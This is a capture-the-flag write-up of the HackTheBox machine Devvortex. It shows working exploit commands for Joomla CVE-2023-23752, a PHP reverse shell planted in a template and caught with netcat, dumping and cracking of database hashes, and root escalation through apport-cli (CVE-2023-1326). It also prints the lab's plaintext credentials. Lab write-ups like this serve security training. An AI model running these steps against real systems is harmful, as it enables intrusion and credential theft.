Post

HackTheBox Devvortex

Writeup for HackTheBox Devvortex

HackTheBox Devvortex

Machine Synopsis

Key exploitation techniques:

  • Joomla Information Disclosure (CVE-2023-23752)
  • Joomla Administrative Access via plaintext credentials
  • Joomla Template Modification for RCE (webshell upload)
  • Database credential extraction and hash cracking (bcrypt)
  • SSH for initial user access
  • apport-cli Privilege Escalation (CVE-2023-1326) via sudo misconfiguration

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
$ nmap -sC -sV 10.10.11.242

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan identified SSH and Nginx on port 80.

webpage

gobuster was used for directory and subdomain enumeration. No interesting directories were found, but a dev.devvortex.htb subdomain was discovered.

1
2
3
4
5
6
7
8
9
# Directory enumeration (no interesting results)
$ gobuster dir -u http://devvortex.htb -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 50 -q
/images               (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css                  (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js                   (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]

# Subdomain enumeration
$ gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -q
Found: dev.devvortex.htb Status: 200 [Size: 23221]

The dev.devvortex.htb subdomain was added to /etc/hosts.

1
echo -e '10.10.11.242\tdev.devvortex.htb' | sudo tee -a /etc/hosts

dev_webpage

Browsing dev.devvortex.htb and then /robots.txt revealed common Joomla paths, including /administrator/.

1
2
3
4
5
# From http://dev.devvortex.htb/robots.txt
User-agent: *
Disallow: /administrator/
Disallow: /api/
...

Accessing /administrator/ presented a Joomla login page. The Joomla version was identified from /README.txt.

dev_administrator_webpage

dev_readme

Joomla Information Disclosure (CVE-2023-23752)

Joomla version 4.x.x is vulnerable to CVE-2023-23752, an information disclosure vulnerability allowing unauthenticated access to sensitive configuration data via the API. This was exploited to retrieve user information and application configuration, including database credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Retrieve user information
$ curl "http://dev.devvortex.htb/api/index.php/v1/users?public=true" | jq .
{
  "links": { ... },
  "data": [
    {
      "type": "users", "id": "649", "attributes": { "id": 649, "name": "lewis", "username": "lewis", "email": "lewis@devvortex.htb", "group_names": "Super Users" }
    },
    {
      "type": "users", "id": "650", "attributes": { "id": 650, "name": "logan paul", "username": "logan", "email": "logan@devvortex.htb", "group_names": "Registered" }
    }
  ],
  "meta": { "total-pages": 1 }
}

# Retrieve application configuration
$ curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .
{
  "links": { ... },
  "data": [
  ...
    { "type": "application", "id": "224", "attributes": { "user": "lewis", "id": 224 } },
    { "type": "application", "id": "224", "attributes": { "password": "P4ntherg0t1n5r3c0n##", "id": 224 } },
    { "type": "application", "id": "224", "attributes": { "db": "joomla", "id": 224 } },
    { "type": "application", "id": "224", "attributes": { "dbprefix": "sd4fg_", "id": 224 } },
  ...
  ],
  "meta": { "total-pages": 4 }
}

This disclosed two users (lewis, logan) and the database credentials lewis:P4ntherg0t1n5r3c0n##.

Exploitation

Joomla RCE (www-data) via Template Modification

The obtained credentials lewis:P4ntherg0t1n5r3c0n## were used to log into the Joomla administrator dashboard.

Within the dashboard, the “System” tab offered “Site Templates” management.

joomla_dashboard

joomla_dashboard_system

joomla_dashboard_administrator_templates

joomla_dashboard_administrator_templates_2

The atum template’s error.php file was selected for modification. A malicious PHP reverse shell payload was inserted into error.php and saved.

1
2
3
4
5
6
7
8
<?php
// PHP reverse shell payload
// Example:
// set_time_limit (0);
// $ip = '10.10.14.16';
// $port = 9999;
// ... (full payload)
?>

joomla_dashboard_administrator_templates_reverseshell

A netcat listener was started on the attacking machine. The error.php page was then accessed via curl, triggering the reverse shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

# Trigger webshell
$ curl "http://dev.devvortex.htb/administrator/templates/atum/error.php"

# Reverse shell received
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.242] 57428
bash: cannot set terminal process group (853): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/administrator/templates/atum$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

This provided a shell as www-data.

Database Credential Extraction (logan)

With www-data access, the internal MySQL database was accessed using the previously found lewis credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
www-data@devvortex:/home/logan$ mysql -h 127.0.0.1 -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
...
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+

mysql> use joomla;
Database changed

mysql> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
...
| sd4fg_user_keys               |
| sd4fg_user_mfa                |
| sd4fg_user_notes              |
| sd4fg_user_profiles           |
| sd4fg_user_usergroup_map      |
| sd4fg_usergroups              |
| sd4fg_users                   |
...

mysql> select username, password from sd4fg_users; 
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

The database contained password hashes for lewis and logan. The hash for logan ($2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12) was extracted and cracked using john.

1
2
3
4
5
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > logan_hash
❯ john logan_hash --wordlist=/usr/share/wordlists/rockyou.txt
...
tequieromucho    (?)
Session completed.

The password for logan was tequieromucho. SSH access was gained using these credentials.

1
2
3
$ ssh logan@10.10.11.242
logan@10.10.11.242's password: tequieromucho
logan@devvortex:~$

Privilege Escalation

apport-cli Abuse (CVE-2023-1326)

sudo -l as logan revealed that apport-cli could be run as root without a password.

1
2
3
4
5
6
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

Checking apport-cli’s version (2.20.11) confirmed its vulnerability to CVE-2023-1326. This vulnerability allows arbitrary command execution when viewing a crash report in vim via apport-cli.

1
2
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

To exploit this, apport-cli -f was used to generate a new report.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
logan@devvortex:~$ sudo /usr/bin/apport-cli -f

*** What kind of problem do you want to report?
...
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 # Choose any option, e.g., Display
...
*** What display problem do you observe?
...
Please choose (1/2/3/4/5/6/7/8/C): 2 # Choose any option, e.g., Freezes or hangs
...
Press any key to continue...
...
*** Send problem report to the developers?
...
Please choose (S/V/K/I/C): V # Choose View report

Selecting “V” (View report) opened the report in vim. Within vim, entering !/bin/bash (followed by Enter) escaped to a root shell.

1
2
3
4
# In vim viewer, type:
!/bin/bash
# Press Enter
root@devvortex:/home/logan#

This successfully granted a root shell.

This post is licensed under CC BY 4.0 by the author.